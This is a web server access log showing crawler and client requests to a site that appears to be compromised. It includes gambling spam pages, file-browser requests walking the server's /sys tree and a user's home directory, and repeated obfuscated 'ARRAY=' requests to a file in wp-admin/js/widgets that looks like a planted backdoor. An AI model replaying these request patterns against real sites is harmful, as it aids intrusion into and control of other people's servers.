74.7.227.173 - - [30/Oct/2025:18:27:44 +0545] "GET /?fileloc=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/virtio0/net/eth0/carrier&path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/virtio0/net/eth0 HTTP/1.1" 200 14175 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:27:52 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/driver/module HTTP/1.1" 200 37408 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
104.36.21.215 - - [30/Oct/2025:18:28:00 +0545] "GET /realestate/index.php/2025/10/24/xtip-sportwetten-erfahrungen/ HTTP/1.1" 200 72659 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
104.140.190.243 - - [30/Oct/2025:18:28:00 +0545] "GET /maps/xtip-wettprogramm-pdf/ HTTP/1.1" 200 73443 "https://dubai91.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
74.7.227.173 - - [30/Oct/2025:18:28:01 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda HTTP/1.1" 200 59827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:23:07 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313438372p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373838372q3439613231626237376266376331656333356438623162663061333430326637222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
104.140.190.243 - - [30/Oct/2025:18:28:10 +0545] "GET /maps/xtip-wettprogramm-pdf/?fileloc=/home/roshanchandy/public_html/dubai91.com/googlef9f69319b2100c7b.html&path=/home/roshanchandy/public_html/dubai91.com HTTP/1.1" 200 12549 "https://dubai91.com/maps/xtip-wettprogramm-pdf/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71"
74.7.227.173 - - [30/Oct/2025:18:28:12 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/net/eth0/queues/rx-0 HTTP/1.1" 200 20063 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:28:25 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block/vda HTTP/1.1" 200 61028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:23:29 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313530392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373930392q6564626265316232656535646238366637633631313033336265333163313034222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:28:35 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_balloon/module HTTP/1.1" 200 35612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:28:47 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/module/drivers HTTP/1.1" 200 15319 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:23:51 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313533312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373933312q3566666161636335313264353639386637623637333938363036623336363439222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:28:59 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_net/module/parameters HTTP/1.1" 200 21819 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:29:09 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/module/holders HTTP/1.1" 200 13725 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:24:13 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313535332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373935332q6439326133323537333564353737343433313136383535336466393534633631222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:29:16 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/subsystem/drivers HTTP/1.1" 200 21034 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:29:26 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/driver/module/notes HTTP/1.1" 200 16378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.131 - - [30/Oct/2025:18:29:31 +0545] "GET /2025/08/28/is-online-roulette-legal-in-united-kingdom/ HTTP/1.1" 200 204948 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.254.81.60 - - [30/Oct/2025:18:24:35 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313537352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373937352q6262343866633538646661646431383334356362656638343838636139623039222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:29:39 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/module/parameters HTTP/1.1" 200 16213 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:29:49 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/power HTTP/1.1" 200 23810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:24:57 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313539372p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832373939372q6430353763663865353932626438343035626261316139643932343531396536222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:29:58 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/driver/module/drivers HTTP/1.1" 200 16177 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:30:11 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/driver/module/sections HTTP/1.1" 200 60318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:25:19 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313631392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383031392q6532336130383335373539666566383366346361333732383139353364613539222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:30:23 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/power HTTP/1.1" 200 23921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.131 - - [30/Oct/2025:18:30:28 +0545] "GET /?1209459810?entity=1207935432 HTTP/1.1" 200 203710 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:30:32 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/bdi HTTP/1.1" 200 27087 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:25:41 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313634312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383034312q6230653161613237303163346436313634343538663831306262633665626264222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:30:42 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio0/driver/module/holders HTTP/1.1" 200 14460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:30:51 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/integrity HTTP/1.1" 200 25891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:31:02 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/holders HTTP/1.1" 200 14447 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:26:03 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313636332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383036332q3365356666646335306663393532353361353533353434643235383439323433222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:31:14 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/subsystem HTTP/1.1" 200 21083 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:26:25 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313638352p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383038352q3366616136613738663366613363616135616364623766363261346465656436222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:31:25 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/device HTTP/1.1" 200 32245 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:31:36 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block/vda/mq HTTP/1.1" 200 16285 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:31:45 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/module/drivers/virtio:virtio_net HTTP/1.1" 200 22459 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:26:47 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313730372p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383130372q3666656137363561316465346566396139373363666236636665376630666232222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:31:56 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/queue HTTP/1.1" 200 89576 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.133 - - [30/Oct/2025:18:32:00 +0545] "GET /126712661?entity=0126553666 HTTP/1.1" 200 201846 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.254.81.60 - - [30/Oct/2025:18:27:09 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313732392p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383132392q3932633135306636643666393263666232343534313735653262326366313565222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:32:12 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/bdi/power HTTP/1.1" 200 24154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:32:23 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/bdi/subsystem HTTP/1.1" 200 19617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:27:31 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313735312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383135312q3366343662346532393264613037613832383930373734616536346236353533222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:32:33 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/mq HTTP/1.1" 200 16063 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:32:43 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/drivers/virtio_blk/virtio1/block/vda/mq/0 HTTP/1.1" 200 23873 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:27:53 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313737332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383137332q3737323731616530313464303164636233656335396665333837316537666361222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:32:54 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/vda1 HTTP/1.1" 200 39613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.173 - - [30/Oct/2025:18:33:05 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/subsystem/vda HTTP/1.1" 200 61449 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
66.249.79.131 - - [30/Oct/2025:18:33:06 +0545] "GET /?112035851?entity=0111895362 HTTP/1.1" 200 203091 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.173 - - [30/Oct/2025:18:33:16 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/module/drivers/virtio:virtio_net/module HTTP/1.1" 200 36750 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
65.254.81.60 - - [30/Oct/2025:18:28:16 +0545] "GET /old/wp-admin/js/widgets/widgets/index.php?ARRAY=7o2230223n313736313833313739362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736313832383139362q3331393337653339653339663832616437323732346465623830343033323364222p2232223n223237393434313139386161623432353733333437653365323536386263303661222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232372q33372q36302q36352q37372q38342q3236227q HTTP/1.1" 504 24510 "-" "-"
74.7.227.173 - - [30/Oct/2025:18:33:29 +0545] "GET /?path=//sys/class/net/lo/subsystem/lo/subsystem/eth0/device/net/eth0/device/driver/virtio0/subsystem/devices/virtio1/block/vda/device/block HTTP/1.1" 200 16269 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
